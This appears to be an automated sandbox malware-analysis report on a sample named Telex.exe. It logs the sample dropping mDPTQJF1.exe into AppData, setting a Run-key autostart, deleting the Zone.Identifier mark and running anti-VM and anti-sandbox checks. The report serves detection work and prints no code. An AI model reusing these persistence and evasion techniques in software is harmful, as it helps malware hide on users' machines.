Source: unknown	Process created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe 'C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe'
Source: C:\Users\user\Desktop\Telex.exe	Process created: C:\Users\user\Desktop\Telex.exe C:\Users\user\Desktop\Telex.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Telex.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Telex.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_00E94470 push edi; iretd	0_2_00E94482
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_00E969D0 pushfd ; iretd	0_2_00E969DE
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_00E96988 pushfd ; iretd	0_2_00E969DE
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_00E96ADB push ss; ret	0_2_00E96AF6
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_00E953D1 push esi; iretd	0_2_00E953D6
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_0267309C push edi; retf	0_2_0267309D
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_026716CA pushfd ; iretd	0_2_026716CD
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_026716D4 pushfd ; iretd	0_2_026716D7
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_009DAD30 push 50009BC2h; iretd	1_2_009DAD35
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_010E70A0 pushad ; retf	1_2_010E70A1
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F309C push edi; retf	15_2_024F309D
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F16CA pushfd ; iretd	15_2_024F16CD
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F16D4 pushfd ; iretd	15_2_024F16D7

Source: initial sample	Static PE information: section name: .text entropy: 7.63584673594
Source: initial sample	Static PE information: section name: .text entropy: 7.63584673594

Source: C:\Users\user\Desktop\Telex.exe

File created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Telex.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mDPTQJF1			Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mDPTQJF1			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\Telex.exe

File opened: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Telex.exe PID: 6352, type: MEMORY
Source: Yara match	File source: Process Memory Space: mDPTQJF1.exe PID: 4652, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\Telex.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\Telex.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Telex.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe	Window / User API: threadDelayed 4116	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Window / User API: threadDelayed 5686	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Window / User API: threadDelayed 9320	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Window / User API: threadDelayed 485	Jump to behavior

